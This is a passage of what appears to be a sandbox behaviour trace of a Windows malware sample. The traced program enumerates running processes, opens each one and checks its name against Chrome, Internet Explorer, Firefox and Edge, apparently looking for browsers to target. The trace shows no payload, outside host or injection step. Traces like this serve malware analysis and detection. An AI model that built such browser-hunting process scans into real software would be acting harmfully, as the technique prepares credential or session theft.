	[0240.401] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0240.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.402] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.402] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0240.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.403] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.403] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0240.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8274
	[0240.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.404] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0240.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.404] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.404] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0240.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.405] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.405] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0240.406] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8278
	[0240.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.406] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0240.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.406] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.407] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0240.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.407] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.407] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0240.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x827c
	[0240.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.408] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0240.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.408] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.408] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0240.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.409] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8280
	[0240.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.410] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.410] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.411] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.411] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8284
	[0240.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.419] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.419] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.420] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.420] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8288
	[0240.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.421] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.422] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.422] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.422] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x828c
	[0240.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.423] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.424] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.424] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.424] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8290
	[0240.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.426] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.426] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.427] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.427] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.427] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8294
	[0240.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.443] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.443] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.443] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.444] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8298
	[0240.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.445] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.445] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.446] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.446] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0240.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x829c
	[0240.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.447] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0240.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.447] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.448] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0240.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.448] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.448] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x82a0
	[0240.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.449] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.450] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.450] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.450] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.450] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0240.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x82a4
	[0240.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.451] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.452] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.452] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.452] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0240.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x82a8
	[0240.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.454] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0240.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.454] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.454] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0240.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.455] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x82ac
	[0240.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.456] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.456] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.456] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.457] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.457] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0240.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x82b0
	[0240.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.458] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0240.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.458] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.459] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0240.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.459] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0240.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x82b4
	[0240.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.461] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0240.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.461] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.461] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0240.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.462] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0240.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x82b8
	[0240.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.463] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0240.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.464] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.464] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0240.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.464] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0240.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x82bc
	[0240.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.465] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0240.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.466] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.466] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0240.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.466] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0240.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0240.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0240.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x82c0
	[0240.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.468] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0240.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.469] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.470] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0240.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.470] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0240.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x82c4
	[0240.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.472] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0240.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.472] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.472] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0240.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.473] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0240.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x82c8
	[0240.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.474] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0240.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.474] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.480] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0240.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.480] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.480] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0240.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x82cc
	[0240.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.481] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0240.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.482] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.482] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0240.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.482] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.482] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0240.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x82d0
	[0240.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.483] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0240.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.484] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.485] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
